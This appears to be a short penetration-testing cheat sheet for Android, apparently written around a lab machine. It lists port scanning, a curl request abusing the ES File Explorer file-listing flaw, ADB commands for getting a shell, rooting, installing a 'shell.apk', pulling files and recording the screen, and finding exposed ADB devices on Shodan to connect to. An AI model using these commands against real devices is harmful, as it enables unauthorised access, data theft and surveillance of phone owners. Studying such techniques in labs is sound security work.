Port Scan on Android
as many random ports can be open on Android devices, its always better to scan all the ports using
https://github.com/RustScan/RustScan/releases
download the debian package
dpkg -i filename
rustscan -a 10.10.10.247
now scan all the open ports with nmap -sC -sV to run default script and for version scan.
Installing ADB
sudo apt-get install android-tools-adb
Abusing ES File Explorer Vuln
Exploiting can be downloaded from here
or can use curl to abuse it
curl --header "Content-Type: application/json" --request POST --data "{\"command\":\"listFiles\"}" http://192.168.0.105:59777
ADB Commands
ADB Cheatsheet is here
#Port forward a port from the Android device to ADB
sudo ssh -p 22 -L 5555:127.0.0.1:5555 bhanu@steins.local
#Connect to a device over wireless
adb tcpip 9090
#connect to the service
adb connect 127.0.0.1:5555
#list connected devices
adb devices
#get a shell from a selected device
#adb -s device_name shell
adb -s 127.0.0.1:5555 shell
#get a shell
adb shell
#get root privs from a shell
su
#install an apk
adb -s "25sdfsfb3801745eg" install "C:\Users\bhanu\Downloads\shell.apk"
#Getting screenshots
adb shell screencap <path to save>
#Recording the screen
adb shell screenrecord <path to save>
#Downloading files
adb pull <source file path> <destination file path>
#Uploading files
adb push <source file path> <destination file path>
#Visiting websites
adb shell am start -a android.intent.action.VIEW -d <URL of the website>
#Getting system information
getprop
Finding Devices on Shodan
android debug bridge
adb connect 100.100.100.100:5555
Get Remote Access of a device
apt install scrcpy
scrcpy
Comments
Post a Comment